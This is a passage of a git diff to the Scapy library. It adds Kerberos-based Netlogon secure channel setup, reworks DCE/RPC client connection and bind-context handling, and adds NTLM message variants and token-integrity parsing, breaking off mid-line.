scapy.layers.msrpce.raw.ms_nrpc import ( NetrServerAuthenticate3_Request, NetrServerAuthenticate3_Response, + NetrServerAuthenticateKerberos_Request, + NetrServerAuthenticateKerberos_Response, NetrServerReqChallenge_Request, NetrServerReqChallenge_Response, NETLOGON_SECURE_CHANNEL_TYPE, @@ -52,8 +56,14 @@ from cryptography.hazmat.primitives import hashes, hmac from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from scapy.libs.rfc3961 import DES + + try: + # cryptography > 47.0 + from cryptography.hazmat.decrepit.ciphers.modes import CFB8 + except ImportError: + from cryptography.hazmat.primitives.ciphers.modes import CFB8 else: - hashes = hmac = Cipher = algorithms = modes = DES = None + hashes = hmac = Cipher = algorithms = modes = DES = CFB8 = None # Typing imports @@ -114,15 +124,17 @@ 0x00200000: "RODC-passthrough", # W: Supports Advanced Encryption Standard (AES) encryption and SHA2 hashing. 0x01000000: "AES", - # Supports Kerberos as the security support provider for secure channel setup. - 0x20000000: "Kerberos", + # Not used. MUST be ignored on receipt. + 0x20000000: "X", # Y: Supports Secure RPC. 0x40000000: "SecureRPC", - # Not used. MUST be ignored on receipt. - 0x80000000: "Z", + # Supports Kerberos as the security support provider for secure channel setup. + 0x80000000: "Kerberos", } _negotiateFlags = FlagsField("", 0, -32, _negotiateFlags).names +# -- CRYPTO + # [MS-NRPC] sect 3.1.4.3.1 @crypto_validator @@ -150,7 +162,7 @@ def ComputeSessionKeyStrongKey(HashNt, ClientChallenge, ServerChallenge): # [MS-NRPC] sect 3.1.4.4.1 @crypto_validator def ComputeNetlogonCredentialAES(Input, Sk): - cipher = Cipher(algorithms.AES(Sk), mode=modes.CFB8(b"\x00" * 16)) + cipher = Cipher(algorithms.AES(Sk), mode=CFB8(b"\x00" * 16)) encryptor = cipher.encryptor() return encryptor.update(Input) @@ -281,6 +293,9 @@ def __init__(self, SessionKey, computername, domainname, AES=True, **kwargs): self.domainname = domainname super(NetlogonSSP, self).__init__(**kwargs) + def GSS_Inquire_names_for_mech(self): + raise NotImplementedError("Netlogon cannot be used with SPNEGO !") + def _secure(self, Context, msgs, Seal): """ Internal function used by GSS_WrapEx and GSS_GetMICEx @@ -336,7 +351,7 @@ def _secure(self, Context, msgs, Seal): if Context.AES: IV = SequenceNumber * 2 encryptor = Cipher( - algorithms.AES(EncryptionKey), mode=modes.CFB8(IV) + algorithms.AES(EncryptionKey), mode=CFB8(IV) ).encryptor() # Confounder signature.Confounder = encryptor.update(Confounder) @@ -363,7 +378,7 @@ def _secure(self, Context, msgs, Seal): if Context.AES: EncryptionKey = self.SessionKey IV = signature.Checksum * 2 - cipher = Cipher(algorithms.AES(EncryptionKey), mode=modes.CFB8(IV)) + cipher = Cipher(algorithms.AES(EncryptionKey), mode=CFB8(IV)) encryptor = cipher.encryptor() signature.SequenceNumber = encryptor.update(SequenceNumber) else: @@ -395,7 +410,7 @@ def _unsecure(self, Context, msgs, signature, Seal): if Context.AES: EncryptionKey = self.SessionKey IV = signature.Checksum * 2 - cipher = Cipher(algorithms.AES(EncryptionKey), mode=modes.CFB8(IV)) + cipher = Cipher(algorithms.AES(EncryptionKey), mode=CFB8(IV)) decryptor = cipher.decryptor() SequenceNumber = decryptor.update(signature.SequenceNumber) else: @@ -426,7 +441,7 @@ def _unsecure(self, Context, msgs, signature, Seal): if Context.AES: IV = SequenceNumber * 2 decryptor = Cipher( - algorithms.AES(EncryptionKey), mode=modes.CFB8(IV) + algorithms.AES(EncryptionKey), mode=CFB8(IV) ).decryptor() # Confounder Confounder = decryptor.update(signature.Confounder) @@ -477,7 +492,7 @@ def GSS_VerifyMICEx(self, Context, msgs, signature): def GSS_Init_sec_context( self, Context: CONTEXT, - token=None, + input_token=None, target_name: Optional[str] = None, req_flags: Optional[GSS_C_FLAGS] = None, chan_bindings: bytes = GSS_C_NO_CHANNEL_BINDINGS, @@ -503,7 +518,7 @@ def GSS_Init_sec_context( def GSS_Accept_sec_context( self, Context: CONTEXT, - token=None, + input_token=None, req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, chan_bindings: bytes = GSS_C_NO_CHANNEL_BINDINGS, ): @@ -569,8 +584,8 @@ class NetlogonClient(DCERPC_Client): >>> cli = NetlogonClient() >>> cli.connect_and_bind("192.168.0.100") >>> cli.establish_secure_channel( - ... domainname="DOMAIN", computername="WIN10", - ... HashNT=bytes.fromhex("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"), + ... UPN="WIN10@DOMAIN", + ... HASHNT=bytes.fromhex("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"), ... ) """ @@ -583,26 +598,25 @@ def __init__( **kwargs, ): self.interface = find_dcerpc_interface("logon") - self.ndr64 = False # Netlogon doesn't work with NDR64 self.SessionKey = None self.ClientStoredCredential = None self.supportAES = supportAES super(NetlogonClient, self).__init__( DCERPC_Transport.NCACN_IP_TCP, auth_level=auth_level, - ndr64=self.ndr64, verb=verb, **kwargs, ) - def connect_and_bind(self, remoteIP): + def connect(self, host, **kwargs): """ This calls DCERPC_Client's connect_and_bind to bind the 'logon' interface. """ - super(NetlogonClient, self).connect_and_bind(remoteIP, self.interface) - - def alter_context(self): - return super(NetlogonClient, self).alter_context(self.interface) + super(NetlogonClient, self).connect( + host=host, + interface=self.interface, + **kwargs, + ) def create_authenticator(self): """ @@ -653,53 +667,56 @@ def validate_authenticator(self, auth): def establish_secure_channel( self, - computername: str, - domainname: str, - HashNt: bytes, + UPN: str, + DC_FQDN: str, + HASHNT: Optional[bytes] = None, + PASSWORD: Optional[str] = None, + KEY=None, + ssp: Optional[KerberosSSP] = None, mode=NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticate3, secureChannelType=NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, ): """ Function to establish the Netlogon Secure Channel. - This uses NetrServerAuthenticate3 to negotiate the session key, then creates a - NetlogonSSP that uses that session key and alters the DCE/RPC session to use it. + This uses NetrServerAuthenticate3 or NetrServerAuthenticateKerberos to + negotiate the session key, then creates a NetlogonSSP that uses that session + key and alters the DCE/RPC session to use it. :param mode: one of NETLOGON_SECURE_CHANNEL_METHOD. This defines which method to use to establish the secure channel. - :param computername: the netbios computer account name that is used to establish - the secure channel. (e.g. WIN10) - :param domainname: the netbios domain name to connect to (e.g. DOMAIN) - :param HashNt: the HashNT of the computer account. + :param UPN: the UPN of the computer account name that is used to establish + the secure channel. (e.g. WIN10$@domain.local) + :param DC_FQDN: the FQDN name of the DC. + + The function then requires one of the following: + + :param HASHNT: the HashNT of the computer account (in Authenticate3 mode). + :param KEY: a Kerberos key to use (in Kerberos mode) + :param PASSWORD: the password of the computer account (any mode). + :param ssp: a KerberosSSP to use (in Kerberos mode) """ - # Flow documented in 3.1.4 Session-Key Negotiation - # and sect 3.4.5.2 for specific calls - clientChall = os.urandom(8) - - # Step 1: NetrServerReqChallenge - netr_server_req_chall_response = self.sr1_req( - NetrServerReqChallenge_Request( - PrimaryName=None, - ComputerName=computername, - ClientChallenge=PNETLOGON_CREDENTIAL( - data=clientChall, - ), - ndr64=self.ndr64, - ndrendian=self.ndrendian, - ) - ) - if ( - NetrServerReqChallenge_Response not in netr_server_req_chall_response - or netr_server_req_chall_response.status != 0 - ): - print( - conf.color_theme.fail( - "! %s" - % STATUS_ERREF.get(netr_server_req_chall_response.status, "Failure") + computername, domainname = _parse_upn(UPN) + # We need to normalize here, since the functions require both the accountname + # and the normal (no dollar) computer name. + if computername.endswith("$"): + computername = computername[:-1] + + if mode == NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticate3: + if ssp or KEY: + raise ValueError("Cannot use 'ssp' on 'KEY' in Authenticate3 mode !") + if not HASHNT: + if PASSWORD: + HASHNT = MD4le(PASSWORD) + else: + raise ValueError("Missing either 'PASSWORD' or 'HASHNT' !") + if "." in domainname: + raise ValueError( + "The UPN in Authenticate3 must have a NETBIOS domain name !" ) - ) - netr_server_req_chall_response.show() - raise ValueError + else: + if HASHNT: + raise ValueError("Cannot use 'HASHNT' in Kerberos mode !") # Calc NegotiateFlags NegotiateFlags = FlagValue( @@ -712,23 +729,61 @@ def establish_secure_channel( # We are either using NetrServerAuthenticate3 or NetrServerAuthenticateKerberos if mode == NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticate3: # We use the legacy NetrServerAuthenticate3 function (NetlogonSSP) - # Step 2: Build the session key + + # Make sure the interface is bound + if not self.bind_or_alter(self.interface): + raise ValueError("Bind failed !") + + # Flow documented in 3.1.4 Session-Key Negotiation + # and sect 3.4.5.2 for specific calls + clientChall = os.urandom(8) + + # Perform NetrServerReqChallenge request + netr_server_req_chall_response = self.sr1_req( + NetrServerReqChallenge_Request( + PrimaryName=None, + ComputerName=computername, + ClientChallenge=PNETLOGON_CREDENTIAL( + data=clientChall, + ), + ndr64=self.ndr64, + ndrendian=self.ndrendian, + ) + ) + if ( + NetrServerReqChallenge_Response not in netr_server_req_chall_response + or netr_server_req_chall_response.status != 0 + ): + print( + conf.color_theme.fail( + "! %s" + % STATUS_ERREF.get( + netr_server_req_chall_response.status, "Failure" + ) + ) + ) + netr_server_req_chall_response.show() + raise ValueError("NetrServerReqChallenge failed !") + + # Build the session key serverChall = netr_server_req_chall_response.ServerChallenge.data if self.supportAES: - SessionKey = ComputeSessionKeyAES(HashNt, clientChall, serverChall) + SessionKey = ComputeSessionKeyAES(HASHNT, clientChall, serverChall) self.ClientStoredCredential = ComputeNetlogonCredentialAES( clientChall, SessionKey ) else: SessionKey = ComputeSessionKeyStrongKey( - HashNt, clientChall, serverChall + HASHNT, clientChall, serverChall ) self.ClientStoredCredential = ComputeNetlogonCredentialDES( clientChall, SessionKey ) + + # Perform Authenticate3 request netr_server_auth3_response = self.sr1_req( NetrServerAuthenticate3_Request( - PrimaryName=None, + PrimaryName="\\\\" + DC_FQDN, AccountName=computername + "$", SecureChannelType=secureChannelType, ComputerName=computername, @@ -740,10 +795,7 @@ def establish_secure_channel( ndrendian=self.ndrendian, ) ) - if ( - NetrServerAuthenticate3_Response not in netr_server_auth3_response - or netr_server_auth3_response.status != 0 - ): + if netr_server_auth3_response.status != 0: # An error occurred. NegotiatedFlags = None if NetrServerAuthenticate3_Response in netr_server_auth3_response: @@ -758,20 +810,8 @@ def establish_secure_channel( % (NegotiatedFlags ^ NegotiateFlags) ) ) + raise ValueError("NetrServerAuthenticate3 failed !") - # Show the error - print( - conf.color_theme.fail( - "! %s" - % STATUS_ERREF.get(netr_server_auth3_response.status, "Failure") - ) - ) - - # If error is unknown, show the packet entirely - if netr_server_auth3_response.status not in STATUS_ERREF: - netr_server_auth3_response.show() - - raise ValueError # Check Server Credential if self.supportAES: if ( @@ -798,10 +838,48 @@ def establish_secure_channel( domainname=domainname, computername=computername, ) + + # Finally alter context (to use the SSP) + if not self.alter_context(self.interface): + raise ValueError("Bind failed !") + elif mode == NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticateKerberos: + # We use the brand new NetrServerAuthenticateKerberos function NegotiateFlags += "Kerberos" - # TODO - raise NotImplementedError - # Finally alter context (to use the SSP) - self.alter_context() + # Set KerberosSSP and alter context + if ssp: + self.ssp = self.sock.session.ssp = ssp + else: + self.ssp = self.sock.session.ssp = KerberosSSP( + UPN=UPN, + SPN="netlogon/" + DC_FQDN, + PASSWORD=PASSWORD, + KEY=KEY, + ) + if not self.bind_or_alter(self.interface): + raise ValueError("Bind failed !") + + # Send AuthenticateKerberos request + netr_server_authkerb_response = self.sr1_req( + NetrServerAuthenticateKerberos_Request( + PrimaryName="\\\\" + DC_FQDN, + AccountName=computername + "$", + AccountType=secureChannelType, + ComputerName=computername, + NegotiateFlags=int(NegotiateFlags), + ndr64=self.ndr64, + ndrendian=self.ndrendian, + ) + ) + if ( + NetrServerAuthenticateKerberos_Response + not in netr_server_authkerb_response + or netr_server_authkerb_response.status != 0 + ): + # An error occurred + netr_server_authkerb_response.show() + raise ValueError("NetrServerAuthenticateKerberos failed !") + + # The NRPC session key is in this case the kerberos one + self.SessionKey = self.sspcontext.SessionKey diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index a25f6587126..e3a1d46a435 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -41,6 +41,7 @@ find_dcerpc_interface, NDRContextHandle, NDRPointer, + RPC_C_IMP_LEVEL, ) from scapy.layers.gssapi import ( SSP, @@ -80,6 +81,7 @@ class DCERPC_Client(object): :param ndrendian: the endianness to use (default little) :param verb: enable verbose logging (default True) :param auth_level: the DCE_C_AUTHN_LEVEL to use + :param impersonation_type: the RPC_C_IMP_LEVEL to use """ def __init__( @@ -89,7 +91,7 @@ def __init__( ndrendian: str = "little", verb: bool = True, auth_level: Optional[DCE_C_AUTHN_LEVEL] = None, - auth_context_id: int = 0, + impersonation_type: RPC_C_IMP_LEVEL = RPC_C_IMP_LEVEL.DEFAULT, **kwargs, ): self.sock = None @@ -100,7 +102,8 @@ def __init__( # Counters self.call_id = 0 - self.all_cont_id = 0 # number of contexts sent + self.next_cont_id = 0 # next available context id + self.next_auth_contex_id = 0 # next available auth context id # Session parameters if ndr64 is None: @@ -118,8 +121,12 @@ def __init__( self.auth_level = DCE_C_AUTHN_LEVEL.CONNECT else: self.auth_level = DCE_C_AUTHN_LEVEL.NONE - self.auth_context_id = auth_context_id + if impersonation_type == RPC_C_IMP_LEVEL.DEFAULT: + # Same default as windows + impersonation_type = RPC_C_IMP_LEVEL.IDENTIFY + self.impersonation_type = impersonation_type self._first_time_on_interface = True + self.contexts = {} self.dcesockargs = kwargs self.dcesockargs["transport"] = self.transport @@ -135,7 +142,6 @@ def from_smblink(cls, smbcli, smb_kwargs={}, **kwargs): DceRpc5, ssp=client.ssp, auth_level=client.auth_level, - auth_context_id=client.auth_context_id, **client.dcesockargs, ) return client @@ -144,23 +150,71 @@ def from_smblink(cls, smbcli, smb_kwargs={}, **kwargs): def session(self) -> DceRpcSession: return self.sock.session - def connect(self, host, port=None, timeout=5, smb_kwargs={}): + def connect( + self, + host, + endpoint: Union[int, str] = None, + port: Optional[int] = None, + interface=None, + timeout=5, + smb_kwargs={}, + ): """ Initiate a connection. :param host: the host to connect to - :param port: (optional) the port to connect to + :param endpoint: (optional) the port/smb pipe to connect to + :param interface: (optional) if endpoint isn't provided, uses the endpoint + mapper to find the appropriate endpoint for that interface. :param timeout: (optional) the connection timeout (default 5) + :param port: (optional) the port to connect to. (useful for SMB) """ + if endpoint is None and interface is not None: + # Figure out the endpoint using the endpoint mapper + + if self.transport == DCERPC_Transport.NCACN_IP_TCP and port is None: + # IP/TCP + # ask the endpoint mapper (port 135) for the IP:PORT + endpoints = get_endpoint( + host, + interface, + ndrendian=self.ndrendian, + verb=self.verb, + ) + if endpoints: + _, endpoint = endpoints[0] + else: + raise ValueError( + "Could not find an available endpoint for that interface !" + ) + elif self.transport == DCERPC_Transport.NCACN_NP: + # SMB + # ask the endpoint mapper (over SMB) for the namedpipe + endpoints = get_endpoint( + host, + interface, + transport=self.transport, + ndrendian=self.ndrendian, + verb=self.verb, + smb_kwargs=smb_kwargs, + ) + if endpoints: + endpoint = endpoints[0].lstrip("\\pipe\\") + else: + return + + # Assign the default port if no port is provided if port is None: if self.transport == DCERPC_Transport.NCACN_IP_TCP: # IP/TCP - port = 135 + port = endpoint or 135 elif self.transport == DCERPC_Transport.NCACN_NP: # SMB port = 445 else: raise ValueError( "Can't guess the port for transport: %s" % self.transport ) + + # Start socket and connect self.host = host self.port = port sock = socket.socket() @@ -177,7 +231,12 @@ def connect(self, host, port=None, timeout=5, smb_kwargs={}): "\u2514 Connected from %s" % repr(sock.getsockname()) ) ) + if self.transport == DCERPC_Transport.NCACN_NP: # SMB + # If the endpoint is provided, connect to it. + if endpoint is not None: + self.open_smbpipe(endpoint) + # We pack the socket into a SMB_RPC_SOCKET sock = self.smbrpcsock = SMB_RPC_SOCKET.from_tcpsock( sock, ssp=self.ssp, **smb_kwargs @@ -189,7 +248,6 @@ def connect(self, host, port=None, timeout=5, smb_kwargs={}): DceRpc5, ssp=self.ssp, auth_level=self.auth_level, - auth_context_id=self.auth_context_id, **self.dcesockargs, ) @@ -347,10 +405,15 @@ def _get_bind_context(self, interface): """ Internal: get the bind DCE/RPC context. """ + if interface in self.contexts: + # We have already found acceptable contexts for this interface, + # reuse that. + return self.contexts[interface] + # NDR 2.0 contexts = [ DceRpc5Context( - cont_id=self.all_cont_id, + cont_id=self.next_cont_id, abstract_syntax=DceRpc5AbstractSyntax( if_uuid=interface.uuid, if_version=interface.if_version, @@ -364,13 +427,13 @@ def _get_bind_context(self, interface): ], ), ] - self.all_cont_id += 1 + self.next_cont_id += 1 # NDR64 if self.ndr64: contexts.append( DceRpc5Context( - cont_id=self.all_cont_id, + cont_id=self.next_cont_id, abstract_syntax=DceRpc5AbstractSyntax( if_uuid=interface.uuid, if_version=interface.if_version, @@ -384,12 +447,12 @@ def _get_bind_context(self, interface): ], ) ) - self.all_cont_id += 1 + self.next_cont_id += 1 # BindTimeFeatureNegotiationBitmask contexts.append( DceRpc5Context( - cont_id=self.all_cont_id, + cont_id=self.next_cont_id, abstract_syntax=DceRpc5AbstractSyntax( if_uuid=interface.uuid, if_version=interface.if_version, @@ -402,11 +465,28 @@ def _get_bind_context(self, interface): ], ) ) - self.all_cont_id += 1 + self.next_cont_id += 1 + + # Store contexts for this interface + self.contexts[interface] = contexts return contexts - def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls): + def _check_bind_context(self, interface, contexts) -> bool: + """ + Internal: check the answer DCE/RPC bind context, and update them. + """ + for i, ctx in enumerate(contexts): + if ctx.result == 0: + # Context was accepted. Remove all others from cache + self.contexts[interface] = [self.contexts[interface][i]] + return True + + return False + + def _bind( + self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls + ) -> bool: """ Internal: used to send a bind/alter request """ @@ -418,6 +498,7 @@ def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls + (" (with %s)" % self.ssp.__class__.__name__ if self.ssp else "") ) ) + # Do we need an authenticated bind if not self.ssp or ( self.sspcontext is not None @@ -452,13 +533,25 @@ def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls if self.auth_level >= DCE_C_AUTHN_LEVEL.PKT_PRIVACY else 0 ) + | ( + GSS_C_FLAGS.GSS_C_IDENTIFY_FLAG + if self.impersonation_type <= RPC_C_IMP_LEVEL.IDENTIFY + else 0 + ) + | ( + GSS_C_FLAGS.GSS_C_DELEG_FLAG + if self.impersonation_type == RPC_C_IMP_LEVEL.DELEGATE + else 0 + ) ), target_name="host/" + self.host, ) + if status not in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: # Authentication failed. self.sspcontext.clifailure() return False + resp = self.sr1( reqcls(context_elem=self._get_bind_context(interface)), auth_verifier=( @@ -467,7 +560,7 @@ def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls else CommonAuthVerifier( auth_type=self.ssp.auth_type, auth_level=self.auth_level, - auth_context_id=self.auth_context_id, + auth_context_id=self.session.auth_context_id, auth_value=token, ) ), @@ -481,16 +574,21 @@ def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls ) ), ) - if respcls not in resp: + + # Check that the answer looks valid and contexts were accepted + if respcls not in resp or not self._check_bind_context( + interface, resp.results + ): token = None status = GSS_S_FAILURE else: # Call the underlying SSP self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, - token=resp.auth_verifier.auth_value, + input_token=resp.auth_verifier.auth_value, target_name="host/" + self.host, ) + if status in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: # Authentication should continue, in two ways: # - through DceRpc5Auth3 (e.g. NTLM) @@ -503,7 +601,7 @@ def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls auth_verifier=CommonAuthVerifier( auth_type=self.ssp.auth_type, auth_level=self.auth_level, - auth_context_id=self.auth_context_id, + auth_context_id=self.session.auth_context_id, auth_value=token, ), ) @@ -518,7 +616,7 @@ def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls auth_verifier=CommonAuthVerifier( auth_type=self.ssp.auth_type, auth_level=self.auth_level, - auth_context_id=self.auth_context_id, + auth_context_id=self.session.auth_context_id, auth_value=token, ), ) @@ -530,22 +628,22 @@ def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls break self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, - token=resp.auth_verifier.auth_value, + input_token=resp.auth_verifier.auth_value, target_name="host/" + self.host, ) else: log_runtime.error("GSS_Init_sec_context failed with %s !" % status) + # Check context acceptance if ( status == GSS_S_COMPLETE and respcls in resp - and any(x.result == 0 for x in resp.results[: int(self.ndr64) + 1]) + and self._check_bind_context(interface, resp.results) ): self.call_id = 0 # reset call id port = resp.sec_addr.port_spec.decode() ndr = self.session.ndr64 and "NDR64" or "NDR32" self.ndr64 = self.session.ndr64 - self.cont_id = int(self.session.ndr64) # ctx 0 for NDR32, 1 for NDR64 if self.verb: print( conf.color_theme.success( @@ -592,7 +690,7 @@ def _bind(self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls resp.show() return False - def bind(self, interface: Union[DceRpcInterface, ComInterface]): + def bind(self, interface: Union[DceRpcInterface, ComInterface]) -> bool: """ Bind the client to an interface @@ -600,7 +698,7 @@ def bind(self, interface: Union[DceRpcInterface, ComInterface]): """ return self._bind(interface, DceRpc5Bind, DceRpc5BindAck) - def alter_context(self, interface: Union[DceRpcInterface, ComInterface]): + def alter_context(self, interface: Union[DceRpcInterface, ComInterface]) -> bool: """ Alter context: post-bind context negotiation @@ -608,7 +706,7 @@ def alter_context(self, interface: Union[DceRpcInterface, ComInterface]): """ return self._bind(interface, DceRpc5AlterContext, DceRpc5AlterContextResp) - def bind_or_alter(self, interface: Union[DceRpcInterface, ComInterface]): + def bind_or_alter(self, interface: Union[DceRpcInterface, ComInterface]) -> bool: """ Bind the client to an interface or alter the context if already bound @@ -616,10 +714,11 @@ def bind_or_alter(self, interface: Union[DceRpcInterface, ComInterface]): """ if not self.session.rpc_bind_interface: # No interface is bound - self.bind(interface) + return self.bind(interface) elif self.session.rpc_bind_interface != interface: # An interface is already bound - self.alter_context(interface) + return self.alter_context(interface) + return True def open_smbpipe(self, name: str): """ @@ -640,7 +739,7 @@ def close_smbpipe(self): def connect_and_bind( self, - ip: str, + host: str, interface: DceRpcInterface, port: Optional[int] = None, timeout: int = 5, @@ -650,45 +749,20 @@ def connect_and_bind( Asks the Endpoint Mapper what address to use to connect to the interface, then uses connect() followed by a bind() - :param ip: the ip to connect to + :param host: the host to connect to :param interface: the DceRpcInterface object :param port: (optional, NCACN_NP only) the port to connect to :param timeout: (optional) the connection timeout (default 5) """ - if self.transport == DCERPC_Transport.NCACN_IP_TCP: - # IP/TCP - # 1. ask the endpoint mapper (port 135) for the IP:PORT - endpoints = get_endpoint( - ip, - interface, - ndrendian=self.ndrendian, - verb=self.verb, - ) - if endpoints: - ip, port = endpoints[0] - else: - return - # 2. Connect to that IP:PORT - self.connect(ip, port=port, timeout=timeout) - elif self.transport == DCERPC_Transport.NCACN_NP: - # SMB - # 1. ask the endpoint mapper (over SMB) for the namedpipe - endpoints = get_endpoint( - ip, - interface, - transport=self.transport, - ndrendian=self.ndrendian, - verb=self.verb, - smb_kwargs=smb_kwargs, - ) - if endpoints: - pipename = endpoints[0].lstrip("\\pipe\\") - else: - return - # 2. connect to the SMB server - self.connect(ip, port=port, timeout=timeout, smb_kwargs=smb_kwargs) - # 3. open the new named pipe - self.open_smbpipe(pipename) + # Connect to the interface using the endpoint mapper + self.connect( + host=host, + interface=interface, + port=port, + timeout=timeout, + smb_kwargs=smb_kwargs, + ) + # Bind in RPC self.bind(interface) @@ -861,15 +935,24 @@ def get_endpoint( """ client = DCERPC_Client( transport, + # EPM only works with NDR32 ndr64=False, ndrendian=ndrendian, verb=verb, ssp=ssp, - ) # EPM only works with NDR32 - client.connect(ip, smb_kwargs=smb_kwargs) - if transport == DCERPC_Transport.NCACN_NP: # SMB - client.open_smbpipe("epmapper") + ) + + if transport == DCERPC_Transport.NCACN_IP_TCP: + endpoint = 135 + elif transport == DCERPC_Transport.NCACN_NP: + endpoint = "epmapper" + else: + raise ValueError("Unknown transport value !") + + client.connect(ip, endpoint=endpoint, smb_kwargs=smb_kwargs) + client.bind(find_dcerpc_interface("ept")) endpoints = client.epm_map(interface) + client.close() return endpoints diff --git a/scapy/layers/msrpce/rpcserver.py b/scapy/layers/msrpce/rpcserver.py index 5a8435cac17..767d8f09c0c 100644 --- a/scapy/layers/msrpce/rpcserver.py +++ b/scapy/layers/msrpce/rpcserver.py @@ -377,9 +377,8 @@ def recv(self, data): print( conf.color_theme.success( f">> {cls.__name__} {self.session.rpc_bind_interface.name}" - f" is on port '{port_spec.decode()}' using " + ( - "NDR64" if self.ndr64 else "NDR32" - ) + f" is on port '{port_spec.decode()}' using " + + ("NDR64" if self.ndr64 else "NDR32") ) ) elif DceRpc5Request in req: diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 556faee0ea5..60258eb6be4 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -60,6 +60,8 @@ from scapy.sessions import StringBuffer from scapy.layers.gssapi import ( + _GSSAPI_OIDS, + _GSSAPI_SIGNATURE_OIDS, GSS_C_FLAGS, GSS_C_NO_CHANNEL_BINDINGS, GSS_S_BAD_BINDINGS, @@ -70,8 +72,6 @@ GSS_S_FLAGS, GssChannelBindings, SSP, - _GSSAPI_OIDS, - _GSSAPI_SIGNATURE_OIDS, ) # Typing imports @@ -94,6 +94,18 @@ ########## +# NTLM structures are all in all very complicated. Many fields don't have a fixed +# position, but are rather referred to with an offset (from the beginning of the +# structure) and a length. In addition to that, there are variants of the structure +# with missing fields when running old versions of Windows (sometimes also seen when +# talking to products that reimplement NTLM, most notably backup applications). + +# We add `_NTLMPayloadField` and `_NTLMPayloadPacket` to parse fields that use an +# offset, and `_NTLM_post_build` to be able to rebuild those offsets. +# In addition, the `NTLM_VARIANT*` allows to select what flavor of NTLM to use +# (NT, XP, or Recent). But in real world use only Recent should be used. + + class _NTLMPayloadField(_StrField[List[Tuple[str, Any]]]): """Special field used to dissect NTLM payloads. This isn't trivial because the offsets are variable.""" @@ -396,6 +408,41 @@ def _NTLM_post_build(self, p, pay_offset, fields, config=_NTLM_CONFIG): ############## +# -- Util: VARIANT class + + +class NTLM_VARIANT(IntEnum): + """ + The message variant to use for NTLM. + """ + + NT_OR_2000 = 0 + XP_OR_2003 = 1 + RECENT = 2 + + +class _NTLM_VARIANT_Packet(_NTLMPayloadPacket): + def __init__(self, *args, **kwargs): + self.VARIANT = kwargs.pop("VARIANT", NTLM_VARIANT.RECENT) + super(_NTLM_VARIANT_Packet, self).__init__(*args, **kwargs) + + def clone_with(self, *args, **kwargs): + pkt = super(_NTLM_VARIANT_Packet, self).clone_with(*args, **kwargs) + pkt.VARIANT = self.VARIANT + return pkt + + def copy(self): + pkt = super(_NTLM_VARIANT_Packet, self).copy() + pkt.VARIANT = self.VARIANT + + return pkt + + def show2(self, dump=False, indent=3, lvl="", label_lvl=""): + return self.__class__(bytes(self), VARIANT=self.VARIANT).show( + dump, indent, lvl, label_lvl + ) + + # Sect 2.2 @@ -406,13 +453,17 @@ class NTLM_Header(Packet): LEIntEnumField( "MessageType", 3, - {1: "NEGOTIATE_MESSAGE", 2: "CHALLENGE_MESSAGE", 3: "AUTHENTICATE_MESSAGE"}, + { + 1: "NEGOTIATE_MESSAGE", + 2: "CHALLENGE_MESSAGE", + 3: "AUTHENTICATE_MESSAGE", + }, ), ] @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): - if _pkt and len(_pkt) >= 10: + if cls is NTLM_Header and _pkt and len(_pkt) >= 10: MessageType = struct.unpack(" 32) and 40 or 32) + OFFSET = lambda pkt: ( + 32 + if ( + pkt.VARIANT == NTLM_VARIANT.NT_OR_2000 + or (pkt.DomainNameBufferOffset or 40) <= 32 + ) + else 40 + ) fields_desc = ( [ NTLM_Header, @@ -510,15 +569,18 @@ class NTLM_NEGOTIATE(_NTLMPayloadPacket): ConditionalField( # (not present on some old Windows versions. We use a heuristic) x, - lambda pkt: ( + lambda pkt: pkt.VARIANT >= NTLM_VARIANT.XP_OR_2003 + and ( ( - 40 - if pkt.DomainNameBufferOffset is None - else pkt.DomainNameBufferOffset or len(pkt.original or b"") + ( + 40 + if pkt.DomainNameBufferOffset is None + else pkt.DomainNameBufferOffset or len(pkt.original or b"") + ) + > 32 ) - > 32 - ) - or pkt.fields.get(x.name, b""), + or pkt.fields.get(x.name, b"") + ), ) for x in _NTLM_Version.fields_desc ] @@ -556,12 +618,42 @@ def post_build(self, pkt, pay): class Single_Host_Data(Packet): fields_desc = [ - LEIntField("Size", 48), + LEIntField("Size", None), LEIntField("Z4", 0), - XStrFixedLenField("CustomData", b"", length=8), + # "CustomData" guessed using LSAP_TOKEN_INFO_INTEGRITY. + FlagsField( + "Flags", + 0, + -32, + { + 0x00000001: "UAC-Restricted", + }, + ), + LEIntEnumField( + "TokenIL", + 0x00002000, + { + 0x00000000: "Untrusted", + 0x00001000: "Low", + 0x00002000: "Medium", + 0x00003000: "High", + 0x00004000: "System", + 0x00005000: "Protected process", + }, + ), XStrFixedLenField("MachineID", b"", length=32), + # KB 5068222 - still waiting for [MS-KILE] update (oct. 2025) + ConditionalField( + XStrFixedLenField("PermanentMachineID", None, length=32), + lambda pkt: pkt.Size is None or 